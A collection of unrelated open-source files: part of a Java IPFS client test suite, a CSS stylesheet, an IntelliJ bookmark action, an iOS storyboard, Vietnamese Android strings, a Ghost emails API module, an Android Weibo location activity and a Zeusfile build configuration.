MerkleNode leaf1Res = ipfs.block.put(Arrays.asList(rawLeaf1), Optional.of("cbor")).get(0); CborObject.CborMerkleLink link = new CborObject.CborMerkleLink(leaf1Res.hash); Map<String, CborObject> m = new TreeMap<>(); m.put("link1", link); CborObject.CborMap source = CborObject.CborMap.build(m); MerkleNode sourceRes = ipfs.block.put(Arrays.asList(source.toByteArray()), Optional.of("cbor")).get(0); CborObject.CborByteArray leaf2 = new CborObject.CborByteArray(("G'day again, IPFS!").getBytes()); byte[] rawLeaf2 = leaf2.toByteArray(); MerkleNode leaf2Res = ipfs.block.put(Arrays.asList(rawLeaf2), Optional.of("cbor")).get(0); Map<String, CborObject> m2 = new TreeMap<>(); m2.put("link1", new CborObject.CborMerkleLink(sourceRes.hash)); m2.put("link2", new CborObject.CborMerkleLink(leaf2Res.hash)); CborObject.CborMap source2 = CborObject.CborMap.build(m2); MerkleNode rootRes = ipfs.block.put(Arrays.asList(source2.toByteArray()), Optional.of("cbor")).get(0); List<Multihash> refs = ipfs.refs(rootRes.hash, false); boolean correct = refs.contains(sourceRes.hash) && refs.contains(leaf2Res.hash) && refs.size() == 2; Assert.assertTrue("refs returns links", correct); List<Multihash> refsRecurse = ipfs.refs(rootRes.hash, true); boolean correctRecurse = refs.contains(sourceRes.hash) && refs.contains(leaf1Res.hash) && refs.contains(leaf2Res.hash) && refs.size() == 3; Assert.assertTrue("refs returns links", correct); } /** * Test that merkle links as a root object are followed during recursive pins */ @Test public void rootMerkleLink() throws IOException { Random r = new Random(); CborObject.CborByteArray target = new CborObject.CborByteArray(("g'day IPFS!" 
+ r.nextInt()).getBytes()); byte[] rawTarget = target.toByteArray(); MerkleNode block1 = ipfs.block.put(Arrays.asList(rawTarget), Optional.of("cbor")).get(0); Multihash block1Hash = block1.hash; byte[] retrievedObj1 = ipfs.block.get(block1Hash); Assert.assertTrue("get inverse of put", Arrays.equals(retrievedObj1, rawTarget)); CborObject.CborMerkleLink cbor2 = new CborObject.CborMerkleLink(block1.hash); byte[] obj2 = cbor2.toByteArray(); MerkleNode block2 = ipfs.block.put(Arrays.asList(obj2), Optional.of("cbor")).get(0); byte[] retrievedObj2 = ipfs.block.get(block2.hash); Assert.assertTrue("get inverse of put", Arrays.equals(retrievedObj2, obj2)); List<Multihash> add = ipfs.pin.add(block2.hash); ipfs.repo.gc(); ipfs.repo.gc(); byte[] bytes = ipfs.block.get(block1.hash); Assert.assertTrue("same contents after GC", Arrays.equals(bytes, rawTarget)); // These commands can be used to reproduce this on the command line String reproCommand1 = "printf \"" + toEscapedHex(rawTarget) + "\" | ipfs block put --format=cbor"; String reproCommand2 = "printf \"" + toEscapedHex(obj2) + "\" | ipfs block put --format=cbor"; System.out.println(); } /** * Test that a cbor null is allowed as an object root */ @Test public void rootNull() throws IOException { CborObject.CborNull cbor = new CborObject.CborNull(); byte[] obj = cbor.toByteArray(); MerkleNode block = ipfs.block.put(Arrays.asList(obj), Optional.of("cbor")).get(0); byte[] retrievedObj = ipfs.block.get(block.hash); Assert.assertTrue("get inverse of put", Arrays.equals(retrievedObj, obj)); List<Multihash> add = ipfs.pin.add(block.hash); ipfs.repo.gc(); ipfs.repo.gc(); // These commands can be used to reproduce this on the command line String reproCommand1 = "printf \"" + toEscapedHex(obj) + "\" | ipfs block put --format=cbor"; System.out.println(); } /** * Test that merkle links in a cbor list are followed during recursive pins */ @Test public void merkleLinkInList() throws IOException { Random r = new Random(); 
CborObject.CborByteArray target = new CborObject.CborByteArray(("g'day IPFS!" + r.nextInt()).getBytes()); byte[] rawTarget = target.toByteArray(); MerkleNode targetRes = ipfs.block.put(Arrays.asList(rawTarget), Optional.of("cbor")).get(0); CborObject.CborMerkleLink link = new CborObject.CborMerkleLink(targetRes.hash); CborObject.CborList source = new CborObject.CborList(Arrays.asList(link)); byte[] rawSource = source.toByteArray(); MerkleNode sourceRes = ipfs.block.put(Arrays.asList(rawSource), Optional.of("cbor")).get(0); List<Multihash> add = ipfs.pin.add(sourceRes.hash); ipfs.repo.gc(); ipfs.repo.gc(); byte[] bytes = ipfs.block.get(targetRes.hash); Assert.assertTrue("same contents after GC", Arrays.equals(bytes, rawTarget)); // These commands can be used to reproduce this on the command line String reproCommand1 = "printf \"" + toEscapedHex(rawTarget) + "\" | ipfs block put --format=cbor"; String reproCommand2 = "printf \"" + toEscapedHex(rawSource) + "\" | ipfs block put --format=cbor"; } @Test public void fileContentsTest() throws IOException { ipfs.repo.gc(); List<Multihash> local = ipfs.refs.local(); for (Multihash hash: local) { try { Map ls = ipfs.file.ls(hash); return; } catch (Exception e) {} // non unixfs files will throw an exception here } } @Test @Ignore("name test may hang forever") public void nameTest() throws IOException { MerkleNode pointer = new MerkleNode("QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB"); Map pub = ipfs.name.publish(pointer.hash); String name = "key" + System.nanoTime(); Object gen = ipfs.key.gen(name, Optional.of("rsa"), Optional.of("2048")); Map mykey = ipfs.name.publish(pointer.hash, Optional.of(name)); String resolved = ipfs.name.resolve(Multihash.fromBase58((String) pub.get("Name"))); } @Test public void dnsTest() throws IOException { String domain = "ipfs.io"; String dns = ipfs.dns(domain, true); } public void mountTest() throws IOException { Map mount = ipfs.mount(null, null); } @Test public void dhtTest() throws 
IOException { MerkleNode raw = ipfs.block.put("Mathematics is wonderful".getBytes(), Optional.of("raw")); // Map get = ipfs.dht.get(raw.hash); // Map put = ipfs.dht.put("somekey", "somevalue"); List<Map<String, Object>> findprovs = ipfs.dht.findprovs(raw.hash); List<Peer> peers = ipfs.swarm.peers(); Map query = ipfs.dht.query(peers.get(0).id); Map find = ipfs.dht.findpeer(peers.get(0).id); } @Test public void localId() throws Exception { Map id = ipfs.id(); System.out.println(); } @Test public void statsTest() throws IOException { Map stats = ipfs.stats.bw(); } public void resolveTest() throws IOException { Multihash hash = Multihash.fromBase58("QmatmE9msSfkKxoffpHwNLNKgwZG8eT9Bud6YoPab52vpy"); Map res = ipfs.resolve("ipns", hash, false); } @Test public void swarmTest() throws IOException { Map<Multihash, List<MultiAddress>> addrs = ipfs.swarm.addrs(); if (addrs.size() > 0) { boolean contacted = addrs.entrySet().stream() .anyMatch(e -> { Multihash target = e.getKey(); List<MultiAddress> nodeAddrs = e.getValue(); boolean contactable = nodeAddrs.stream() .anyMatch(addr -> { try { MultiAddress peer = new MultiAddress(addr.toString() + "/ipfs/" + target.toBase58()); Map connect = ipfs.swarm.connect(peer); Map disconnect = ipfs.swarm.disconnect(peer); return true; } catch (Exception ex) { return false; } }); try { Map id = ipfs.id(target); Map ping = ipfs.ping(target); return contactable; } catch (Exception ex) { // not all nodes have to be contactable return false; } }); if (!contacted) throw new IllegalStateException("Couldn't contact any node!"); } List<Peer> peers = ipfs.swarm.peers(); System.out.println(peers); } @Test public void bootstrapTest() throws IOException { List<MultiAddress> bootstrap = ipfs.bootstrap.list(); System.out.println(bootstrap); List<MultiAddress> rm = ipfs.bootstrap.rm(bootstrap.get(0), false); List<MultiAddress> add = ipfs.bootstrap.add(bootstrap.get(0)); System.out.println(); } @Test public void diagTest() throws IOException { Map config = 
ipfs.config.show(); Object mdns = ipfs.config.get("Discovery.MDNS.Interval"); Object val = ipfs.config.get("Datastore.GCPeriod"); Map setResult = ipfs.config.set("Datastore.GCPeriod", val); ipfs.config.replace(new NamedStreamable.ByteArrayWrapper(JSONParser.toString(config).getBytes())); // Object log = ipfs.log(); String sys = ipfs.diag.sys(); String cmds = ipfs.diag.cmds(); } @Test public void toolsTest() throws IOException { String version = ipfs.version(); int major = Integer.parseInt(version.split("\\.")[0]); int minor = Integer.parseInt(version.split("\\.")[1]); assertTrue(major >= 0 && minor >= 4); // Requires at least 0.4.0 Map commands = ipfs.commands(); } @Test(expected = RuntimeException.class) public void testTimeoutFail() throws IOException { IPFS ipfs = new IPFS(new MultiAddress("/ip4/127.0.0.1/tcp/5001")).timeout(1000); ipfs.cat(Multihash.fromBase58("QmYpbSXyiCTYCbyMpzrQNix72nBYB8WRv6i39JqRc8C1ry")); } @Test public void testTimeoutOK() throws IOException { IPFS ipfs = new IPFS(new MultiAddress("/ip4/127.0.0.1/tcp/5001")).timeout(1000); ipfs.cat(Multihash.fromBase58("Qmaisz6NMhDB51cCvNWa1GMS7LU1pAxdF4Ld6Ft9kZEP2a")); } // this api is disabled until deployment over IPFS is enabled public void updateTest() throws IOException { Object check = ipfs.update.check(); Object update = ipfs.update(); } private byte[] randomBytes(int len) { byte[] res = new byte[len]; r.nextBytes(res); return res; } }
{ "pile_set_name": "Github" }
/*
 * Layout and theme for the example browser: an example list, an Ace code
 * editor, and a log output pane, all pinned absolutely inside the viewport.
 */

/* Use border-box sizing everywhere so padding does not grow element width. */
* {
  box-sizing: border-box;
}

body {
  padding: 0;
  margin: 0;
  font-family: 'Dosis', sans-serif;
  font-size: 18px;
  background-color: #eee;
  overflow: hidden;
  /* Pin the body to the viewport edges. */
  position: absolute;
  top: 0px;
  bottom: 0px;
  right: 0px;
  left: 0px;
}

h1 {
  margin-left: 38px;
  font-size: 42px;
  font-weight: 200;
  letter-spacing: 1px;
}

h2 {
  margin: 30px 0 20px 0;
  font-weight: 700;
  font-size: 22px;
  letter-spacing: 1px;
}

/* Columns start hidden; the page script reveals them. */
.column {
  position: absolute;
  top: 110px;
  bottom: 0px;
  border-left: 1px dotted #bbb;
  padding: 0 0 0 20px;
  display: none;
}

#example-list {
  position: absolute;
  top: 50px;
  left: 20px;
  right: 0px;
  bottom: 0px;
  /* Fixed: the generic family keyword was misspelled "monospaceace",
     which made the monospace fallback invalid. */
  font-family: Monaco, Menlo, "Ubuntu Mono", Consolas, source-code-pro, monospace;
  font-size: 12px;
  overflow: hidden;
  padding-bottom: 20px;
}

.example-item {
  padding: 4px 0 4px 0;
  cursor: pointer;
}

.example-item:hover {
  background-color: rgba(0, 0, 0, 0.05);
}

#code-editor {
  position: absolute;
  top: 50px;
  left: 20px;
  right: 0px;
  bottom: 0px;
  background: #eee;
}

#log-output {
  position: absolute;
  top: 50px;
  left: 20px;
  right: 0px;
  bottom: 0px;
  padding-bottom: 20px;
  /* Fixed: same "monospaceace" typo as in #example-list. */
  font-family: Monaco, Menlo, "Ubuntu Mono", Consolas, source-code-pro, monospace;
  font-size: 12px;
  background: #eee;
  overflow: auto;
  white-space: pre-wrap;
  word-wrap: break-word;
}

.log-entry {
  margin-bottom: 4px;
  padding-bottom: 4px;
  border-bottom: 1px dotted #b4b4b4;
}

.log-entry-details {
  color: #b4b4b4;
  margin-right: 8px;
}

.log-entry-info {
  color: black;
}

.log-entry-debug {
  color: black;
}

.log-entry-warn {
  color: #ff9100;
}

.log-entry-error {
  color: red;
}

#run-button {
  position: absolute;
  top: -2px;
  left: 24px;
  width: 26px;
  height: 26px;
  border-radius: 50%;
  z-index: 20000;
  cursor: pointer;
  background-color: #82CA6D;
  background-image: url("../img/run-icon.svg");
  background-size: 16px 16px;
  background-position: center center;
  background-repeat: no-repeat;
}

#run-button:hover {
  background-color: #64a151;
}

#run-button:active {
  /* Nudge one pixel down-right for a pressed effect. */
  top: -1px;
  left: 25px;
}

.ace_gutter-cell {
  opacity: 0.3 !important;
}
{ "pile_set_name": "Github" }
// Copyright 2000-2019 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file. package com.intellij.ide.bookmarks.actions; import com.intellij.icons.AllIcons; import com.intellij.ide.IdeBundle; import com.intellij.ide.bookmarks.BookmarkManager; import com.intellij.lang.LangBundle; import com.intellij.openapi.actionSystem.*; import com.intellij.openapi.editor.Editor; import com.intellij.openapi.project.DumbAware; import com.intellij.openapi.project.Project; import org.jetbrains.annotations.NotNull; public class ToggleBookmarkAction extends BookmarksAction implements DumbAware, Toggleable { public ToggleBookmarkAction() { getTemplatePresentation().setText(IdeBundle.messagePointer("action.bookmark.toggle")); } @Override public void update(@NotNull AnActionEvent event) { Project project = event.getProject(); DataContext dataContext = event.getDataContext(); event.getPresentation().setEnabled(project != null && (CommonDataKeys.EDITOR.getData(dataContext) != null || CommonDataKeys.VIRTUAL_FILE.getData(dataContext) != null)); if (ActionPlaces.TOUCHBAR_GENERAL.equals(event.getPlace())) { event.getPresentation().setIcon(AllIcons.Actions.Checked); } final BookmarkInContextInfo info = getBookmarkInfo(event); final boolean selected = info != null && info.getBookmarkAtPlace() != null; if (ActionPlaces.isPopupPlace(event.getPlace())) { event.getPresentation().setText(selected ? 
LangBundle.message("action.clear.bookmark.text") : LangBundle.message("action.set.bookmark.text")); } else { event.getPresentation().setText(IdeBundle.messagePointer("action.bookmark.toggle")); Toggleable.setSelected(event.getPresentation(), selected); } } @Override public void actionPerformed(@NotNull AnActionEvent e) { Project project = e.getProject(); if (project == null) return; final BookmarkInContextInfo info = getBookmarkInfo(e); if (info == null) return; final boolean selected = info.getBookmarkAtPlace() != null; Toggleable.setSelected(e.getPresentation(), selected); if (selected) { BookmarkManager.getInstance(project).removeBookmark(info.getBookmarkAtPlace()); } else { Editor editor = e.getData(CommonDataKeys.EDITOR); if (editor != null) { BookmarkManager.getInstance(project).addEditorBookmark(editor, info.getLine()); } else { BookmarkManager.getInstance(project).addTextBookmark(info.getFile(), info.getLine(), ""); } } } public static BookmarkInContextInfo getBookmarkInfo(@NotNull AnActionEvent e) { Project project = e.getProject(); if (project == null) return null; final BookmarkInContextInfo info = new BookmarkInContextInfo(e.getDataContext(), project).invoke(); return info.getFile() == null ? null : info; } }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="17147" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="vXZ-lx-hvc"> <device id="retina4_7" orientation="portrait" appearance="light"/> <dependencies> <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="17120"/> <capability name="Safe area layout guides" minToolsVersion="9.0"/> <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/> </dependencies> <scenes> <!--View Controller--> <scene sceneID="ufC-wZ-h7g"> <objects> <viewController id="vXZ-lx-hvc" customClass="ViewController" customModule="PhotoKitData" customModuleProvider="target" sceneMemberID="viewController"> <view key="view" contentMode="scaleToFill" id="kh9-bI-dsS"> <rect key="frame" x="0.0" y="0.0" width="375" height="667"/> <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/> <subviews> <button opaque="NO" contentMode="scaleToFill" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="qDc-VS-wqm"> <rect key="frame" x="43" y="111" width="81" height="30"/> <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/> <state key="normal" title="List Albums"> <color key="titleShadowColor" red="0.5" green="0.5" blue="0.5" alpha="1" colorSpace="custom" customColorSpace="sRGB"/> </state> <connections> <action selector="doButton2:" destination="vXZ-lx-hvc" eventType="touchUpInside" id="aBc-Sv-OEf"/> </connections> </button> <button opaque="NO" contentMode="scaleToFill" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" 
translatesAutoresizingMaskIntoConstraints="NO" id="H5O-Sx-1pW"> <rect key="frame" x="43" y="189" width="175" height="30"/> <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/> <state key="normal" title="List Photos in One Album"> <color key="titleShadowColor" red="0.5" green="0.5" blue="0.5" alpha="1" colorSpace="custom" customColorSpace="sRGB"/> </state> <connections> <action selector="doButton3:" destination="vXZ-lx-hvc" eventType="touchUpInside" id="6we-T7-Seu"/> </connections> </button> <button opaque="NO" contentMode="scaleToFill" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="ejq-Gm-Jon"> <rect key="frame" x="43" y="269" width="94" height="30"/> <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/> <state key="normal" title="Create Album"> <color key="titleShadowColor" red="0.5" green="0.5" blue="0.5" alpha="1" colorSpace="custom" customColorSpace="sRGB"/> </state> <connections> <action selector="doButton4:" destination="vXZ-lx-hvc" eventType="touchUpInside" id="g14-zk-G4O"/> </connections> </button> <button opaque="NO" contentMode="scaleToFill" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="BZb-53-U49"> <rect key="frame" x="43" y="354" width="209" height="30"/> <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/> <state key="normal" title="Add Photo to Created Album"> <color key="titleShadowColor" red="0.5" green="0.5" blue="0.5" alpha="1" colorSpace="custom" customColorSpace="sRGB"/> </state> <connections> <action selector="doButton5:" destination="vXZ-lx-hvc" eventType="touchUpInside" id="Qts-tl-bdy"/> </connections> </button> </subviews> <viewLayoutGuide key="safeArea" id="3og-4K-0g1"/> 
<color key="backgroundColor" red="1" green="1" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/> </view> </viewController> <placeholder placeholderIdentifier="IBFirstResponder" id="x5A-6p-PRh" sceneMemberID="firstResponder"/> </objects> <point key="canvasLocation" x="132" y="114"/> </scene> </scenes> </document>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?>
<!--Generated by crowdin.com-->
<resources>
    <string name="debug_toast_enabled">Soát lỗi đang bật. Hãy quay về cài đặt.</string>
    <string name="debug_toast_already_enabled">Đã bật soát lỗi. Hãy quay lại phần cài đặt.</string>
    <string name="debug_disclaimer_info">Dù hầu hết các thông tin cá nhân đều tự động bị xoá khỏi báo cáo, một số thông tin nhạy cảm có thể vẫn xuất hiện. \nHãy xem lại báo cáo lỗi trước khi gửi đi. \n\nBấm một trong các tuỳ chọn dưới đây để soạn email chứa dữ liệu trang web. </string>
    <string name="debug_incomplete">Báo cáo không đầy đủ</string>
    <string name="debug_web">Dò lỗi từ web</string>
    <string name="debug_web_desc">Chuyển đến trang bị lỗi và gửi thông tin để dò lỗi.</string>
    <string name="parsing_data">Phân tích dữ liệu</string>
    <string name="debug_parsers">Phân tích lỗi</string>
    <string name="debug_parsers_desc">Mở một trong các bộ phân tích lỗi để dò lỗi từ kết quả phân tích</string>
</resources>
{ "pile_set_name": "Github" }
const models = require('../../models'); const {i18n} = require('../../lib/common'); const errors = require('@tryghost/errors'); const megaService = require('../../services/mega'); module.exports = { docName: 'emails', read: { options: [ 'fields' ], validation: { options: { fields: ['html', 'plaintext', 'subject'] } }, data: [ 'id' ], permissions: true, query(frame) { return models.Email.findOne(frame.data, frame.options) .then((model) => { if (!model) { throw new errors.NotFoundError({ message: i18n.t('errors.models.email.emailNotFound') }); } return model; }); } }, retry: { data: [ 'id' ], permissions: true, query(frame) { return models.Email.findOne(frame.data, frame.options) .then(async (model) => { if (!model) { throw new errors.NotFoundError({ message: i18n.t('errors.models.email.emailNotFound') }); } if (model.get('status') !== 'failed') { throw new errors.IncorrectUsageError({ message: i18n.t('errors.models.email.retryNotAllowed') }); } return await megaService.mega.retryFailedEmail(model); }); } } };
{ "pile_set_name": "Github" }
package org.zarroboogs.weibo.activity; //import com.google.android.gms.maps.CameraUpdate; //import com.google.android.gms.maps.CameraUpdateFactory; //import com.google.android.gms.maps.GoogleMap; //import com.google.android.gms.maps.SupportMapFragment; //import com.google.android.gms.maps.model.LatLng; //import com.google.android.gms.maps.model.Marker; //import com.google.android.gms.maps.model.MarkerOptions; import org.zarroboogs.util.net.WeiboException; import org.zarroboogs.weibo.BeeboApplication; import org.zarroboogs.weibo.R; import org.zarroboogs.weibo.asynctask.MyAsyncTask; import org.zarroboogs.weibo.bean.GeoBean; import org.zarroboogs.weibo.bean.MessageBean; import org.zarroboogs.weibo.bean.data.NearbyStatusListBean; import org.zarroboogs.weibo.dao.NearbyTimeLineDao; import org.zarroboogs.weibo.support.utils.Utility; import android.content.Context; import android.location.Address; import android.location.Geocoder; import android.location.Location; import android.location.LocationListener; import android.location.LocationManager; import android.os.Bundle; import android.text.TextUtils; import android.view.LayoutInflater; import android.view.Menu; import android.view.MenuItem; import android.widget.ProgressBar; import android.widget.Toast; import java.io.IOException; import java.util.HashMap; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.Set; public class NearbyTimeLineActivity extends AbstractAppActivity { // private GoogleMap mMap; private double lat; private double lon; private String locationStr; // private Marker melbourne; // private Map<Marker, MessageBean> bindEvent = new HashMap<Marker, // MessageBean>(); private GetGoogleLocationInfo locationTask; private FetchWeiboMsg fetchWeiboMsg; private MenuItem refresh; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.map); // getActionBar().setDisplayShowHomeEnabled(false); // 
getActionBar().setDisplayShowTitleEnabled(true); // getActionBar().setDisplayHomeAsUpEnabled(false); // getActionBar().setTitle(getString(R.string.nearby)); addLocation(); } @Override protected void onResume() { super.onResume(); if (TextUtils.isEmpty(locationStr)) { if (Utility.isTaskStopped(locationTask)) { GeoBean geoBean = new GeoBean(); geoBean.setLatitude(lat); geoBean.setLongitude(lon); locationTask = new GetGoogleLocationInfo(geoBean); locationTask.executeOnExecutor(MyAsyncTask.THREAD_POOL_EXECUTOR); } } } @Override protected void onPause() { super.onPause(); Utility.cancelTasks(locationTask); } private void setUpMapIfNeeded() { // if (mMap == null) { // mMap = ((SupportMapFragment) // getSupportFragmentManager().findFragmentById(R.id.map)) // .getMap(); // if (mMap != null) { // mMap.setMapType(GoogleMap.MAP_TYPE_NORMAL); // // mMap.setOnInfoWindowClickListener(new // GoogleMap.OnInfoWindowClickListener() { // public void onInfoWindowClick(Marker marker) { // MessageBean msg = bindEvent.get(marker); // if (msg != null) { // startActivityForResult(BrowserWeiboMsgActivity.newIntent(msg, // GlobalContext.getInstance().getSpecialToken()), 0); // } // } // }); // // final LatLng MELBOURNE = new LatLng(lat, lon); // melbourne = mMap.addMarker(new MarkerOptions() // .position(MELBOURNE) // .title(GlobalContext.getInstance().getCurrentAccountName()) // .snippet(String.format("[%f,%f]", lat, lon) // )); // melbourne.showInfoWindow(); // LatLng latLng = new LatLng(lat, lon); // CameraUpdate update = CameraUpdateFactory.newLatLng(latLng); // mMap.moveCamera(update); // // } // } } @Override public boolean onCreateOptionsMenu(Menu menu) { getMenuInflater().inflate(R.menu.actionbar_menu_nearbytimelineactivity, menu); refresh = menu.findItem(R.id.refresh); return super.onCreateOptionsMenu(menu); } @Override public boolean onOptionsItemSelected(MenuItem item) { int itemId = item.getItemId(); if (itemId == R.id.refresh) { } return super.onOptionsItemSelected(item); } 
private class GetGoogleLocationInfo extends MyAsyncTask<Void, String, String> { GeoBean geoBean; public GetGoogleLocationInfo(GeoBean geoBean) { this.geoBean = geoBean; } @Override protected String doInBackground(Void... params) { Geocoder geocoder = new Geocoder(NearbyTimeLineActivity.this, Locale.getDefault()); List<Address> addresses = null; try { addresses = geocoder.getFromLocation(geoBean.getLat(), geoBean.getLon(), 1); } catch (IOException e) { cancel(true); } if (addresses != null && addresses.size() > 0) { Address address = addresses.get(0); StringBuilder builder = new StringBuilder(); int size = address.getMaxAddressLineIndex(); for (int i = 0; i < size; i++) { builder.append(address.getAddressLine(i)); } return builder.toString(); } return ""; } @Override protected void onPostExecute(String s) { // if (!TextUtils.isEmpty(s) && melbourne != null) { // melbourne.showInfoWindow(); // getActionBar().setSubtitle(s); // } super.onPostExecute(s); } } private void addLocation() { LocationManager locationManager = (LocationManager) NearbyTimeLineActivity.this .getSystemService(Context.LOCATION_SERVICE); if (!locationManager.isProviderEnabled(LocationManager.GPS_PROVIDER) && !locationManager.isProviderEnabled(LocationManager.NETWORK_PROVIDER)) { Toast.makeText(NearbyTimeLineActivity.this, getString(R.string.please_open_gps), Toast.LENGTH_SHORT).show(); return; } Toast.makeText(NearbyTimeLineActivity.this, getString(R.string.gps_is_searching), Toast.LENGTH_SHORT).show(); if (locationManager.isProviderEnabled(LocationManager.NETWORK_PROVIDER)) { locationManager.requestLocationUpdates(LocationManager.NETWORK_PROVIDER, 1000, 0, locationListener); } if (locationManager.isProviderEnabled(LocationManager.GPS_PROVIDER)) { locationManager.requestLocationUpdates(LocationManager.GPS_PROVIDER, 1000, 0, locationListener); } } private void updateWithNewLocation(Location result) { GeoBean geoBean = new GeoBean(); lat = result.getLatitude(); lon = result.getLongitude(); 
setUpMapIfNeeded(); geoBean.setLatitude(lat); geoBean.setLongitude(lon); if (Utility.isTaskStopped(locationTask)) { locationTask = new GetGoogleLocationInfo(geoBean); locationTask.executeOnExecutor(MyAsyncTask.THREAD_POOL_EXECUTOR); } if (Utility.isTaskStopped(fetchWeiboMsg)) { fetchWeiboMsg = new FetchWeiboMsg(); fetchWeiboMsg.executeOnExecutor(MyAsyncTask.THREAD_POOL_EXECUTOR); } ((LocationManager) NearbyTimeLineActivity.this.getSystemService(Context.LOCATION_SERVICE)) .removeUpdates(locationListener); } private final LocationListener locationListener = new LocationListener() { public void onLocationChanged(Location location) { updateWithNewLocation(location); } public void onProviderDisabled(String provider) { } public void onProviderEnabled(String provider) { } public void onStatusChanged(String provider, int status, Bundle extras) { } }; private class FetchWeiboMsg extends MyAsyncTask<Void, Void, NearbyStatusListBean> { @Override protected void onPreExecute() { super.onPreExecute(); LayoutInflater inflater = (LayoutInflater) getSystemService(Context.LAYOUT_INFLATER_SERVICE); ProgressBar pb = (ProgressBar) inflater.inflate(R.layout.editmyprofileactivity_refresh_actionbar_view_layout, null); refresh.setActionView(pb); } @Override protected NearbyStatusListBean doInBackground(Void... 
params) { try { return new NearbyTimeLineDao(BeeboApplication.getInstance().getAccessToken(), lat, lon).get(); } catch (WeiboException e) { e.printStackTrace(); } return null; } @Override protected void onPostExecute(NearbyStatusListBean nearbyStatusListBean) { super.onPostExecute(nearbyStatusListBean); if (refresh.getActionView() != null) { refresh.getActionView().clearAnimation(); refresh.setActionView(null); } if (nearbyStatusListBean == null) { return; } List<MessageBean> messageBeanList = nearbyStatusListBean.getItemList(); for (MessageBean msg : messageBeanList) { GeoBean g = msg.getGeo(); if (g == null) { continue; } // final LatLng MELBOURNE = new LatLng(g.getLat(), g.getLon()); // Marker melbourne = mMap.addMarker(new MarkerOptions() // .position(MELBOURNE) // .title(msg.getUser().getScreen_name()) // .snippet(msg.getText()) // ); // melbourne.showInfoWindow(); // bindEvent.put(melbourne, msg); } } } }
{ "pile_set_name": "Github" }
# ________ ____ __ __ ______ # \___ // __ \| | \/ ___/ # / /\ ___/| | /\___ \ # /_____ \\___ >____//____ > # \/ \/ \/ # Build System # v0.8.1 # # default interpreter used for Zeusfile code is bash # that means all commands without the language field are treated as shell scripts # to change the default script language, use the language field # to change the language of an individual command, use the language field directly on the command language: bash # globals are visible for all commands # they can contain variables # for language specific code create a globals.[scriptExtension] file in the zeus directory globals: binaryName: zeus buildDir: bin version: 0.8 # all commands # available fields: # Field # Type # Info # ------------------------- # -------------- # -------------------------------------------------------------- # description # string # a short description text that will be display on startup # help # string # a multi line manual entry for detailed explanations # dependencies # []string # a list of dependency commands with their arguments # outputs # []string # a list of ouputs files / directories # buildNumber # bool # increment buildNumber each execution # arguments # []string # list of typed arguments, allows optionals and default values # async # bool # detach comamnd async in a screen session, attach on demand # path # string # custom path for script file # exec # string # supply the script directly without a file commands: # multi language examples # python: description: a python script language: python arguments: - src:String - dst:String exec: | python_greet() print("src=" + src) print("dst=" + dst) ruby: description: a ruby script language: ruby arguments: - src:String - dst:String exec: | puts "hello from ruby!" puts "source=" + $src puts "destination=" + $dst lua: description: a lua script language: lua arguments: - src:String - dst:String exec: | print("Hello World! 
from lua!") print("source=", src) print("destination=", dst) javascript: description: a javascript program language: javascript arguments: - src:String - dst:String exec: | console.log("[ZEUS v" + version + "] Hello World!"); console.log("source=" + src); console.log("destination=" + dst); # examples # cycle1: description: produce a cycle dependencies: - cycle2 outputs: exec: echo "cycle1 called!" cycle2: description: produce a cycle dependencies: - cycle1 exec: echo "cycle2 called!" arguments: description: test optional command arguments help: | this is an example for the optional commands argument imagine a remote login scenario arguments: - user:String? = bob - password:String - ipAddr:String - port:Int? = 80 dependencies: outputs: exec: | print("test-optionals:") print("user=" + user) print("password=" + password) print("ipAddr=" + ipAddr) print("port=" + port) buildNumber: description: increase build number each execution buildNumber: true exec: echo "increasing buildNumber" chain: description: test chained commands dependencies: - dependency2 - async - arguments password=test ipAddr=192.168.1.5 exec: echo "testing chained commands" async: description: test asyncronous command execution help: | this is an example for the asyncronous command execution outputs: async: true exec: | sleep 3 && echo "ping" && sleep 3 && echo "ping" sleep 3 && echo "ping" && sleep 3 && echo "ping" sleep 3 && echo "ping" && sleep 3 && echo "ping" sleep 3 && echo "ping" && sleep 3 && echo "ping" dependency1: description: test dependencies help: | this is an example for the dependencies outputs: - tests/bin/dependency1 buildNumber: true exec: | touch tests/bin/dependency1 dependency2: description: test dependencies help: | this is an example for the dependencies dependencies: - dependency1 buildNumber: true exec: | touch tests/bin/dependency2 all: description: description for command all help: help text for command all arguments: dependencies: - clean - configure outputs: clean: 
description: description for command clean help: help text for command clean arguments: dependencies: outputs: build: description: description for command build help: help text for command build arguments: dependencies: outputs: configure: description: description for command configure help: help text for command configure arguments: dependencies: outputs:
{ "pile_set_name": "Github" }
